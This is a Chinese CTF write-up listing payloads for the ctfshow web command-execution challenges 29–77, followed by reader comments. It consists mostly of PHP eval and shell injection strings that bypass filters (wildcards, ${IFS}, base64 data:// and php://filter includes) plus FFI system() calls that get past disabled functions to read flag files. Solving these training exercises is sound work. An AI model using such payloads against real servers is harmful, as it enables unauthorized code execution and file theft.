【原创】ctfshow—web入门—命令执行 (29-77)

[huayang]

web29

?c=echo `nl flag.php`

web30

?c=echo `nl fl\ag.p\hp`

web31

?C=highlight_file($_GET[1])?>&1=flag.php

web32

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web33

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web34


同上

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web35

同上

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web36

同上

/?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web37

/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web38

同上

/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

web39


?c=data:text/plain,<?php system('cat fla?.php')?>

web40

?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

web41

https://blog.csdn.net/miuzzx/article/details/108569080

web42

?c=cat flag.php;

必须要 ;

web43

web44

?c=nl fla\g.php||

web45

?c=nl<fl\ag.php||

web46

?c=nl<fl\ag.php||

web47

?c=nl<fl\ag.php||

web48

?c=nl<fl\ag.php||

web49

?c=nl<fl\ag.php||

web50

?c=nl<fl\ag.php||

web51

?c=nl<fl\ag.php||

web52

?c=nl${IFS}/fla\g||

web53

?c=nl${IFS}fla\g.php&

web54

?c=grep${IFS}'fla'${IFS}fla?.php

web55

先写一个post上传的数据包

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://09bc84d8-cb8a-43a0-8ca0-8b0df54b56e9.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

上传并抓包

payload :
?c=.+/???/????????[@-[]
!/bin/sh
ls
!/bin/sh
cat flag.php

方法二

payload:?c=/???/????64%20/????.???

不能用火狐

web56

同上

禁用了数字所以方法二不能用

web57

payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))))))

web58——web65

post:
c=show_source('flag.php')

web66——web70

post:
c=print_r(scandir("/"));
post:
c=highlight_file('flag.txt');

这里用show_source()会报错

web71

c=$a=new DirectoryIterator("glob:///*"); foreach($a as $f){ echo $f."    " ; } exit();
post:
c=include('/flag.txt');exit(0);

web72

web73-74

payload 查文件
c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' '); }exit(0); ?>
c=include('/flagc.txt');exit(0);

web75-76

c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

web77

c=$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();

再访问1.txt

[/huayang]

==>转载请注明来源哦<==

评论

  1. 头像
    豆奶特浓
    Windows Firefox
    4月前
    2021-10-07 20:22:58

    牛啊

  2. 头像
    hhh
    Windows Firefox
    5月前
    2021-9-10 23:17:02

    xuexi

  3. 头像
    haha
    Windows Edge
    5月前
    2021-9-08 14:59:50

    前来学习

  4. 头像
    y
    Windows Edge
    5月前
    2021-8-31 20:01:04

    谢谢大佬的wp

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇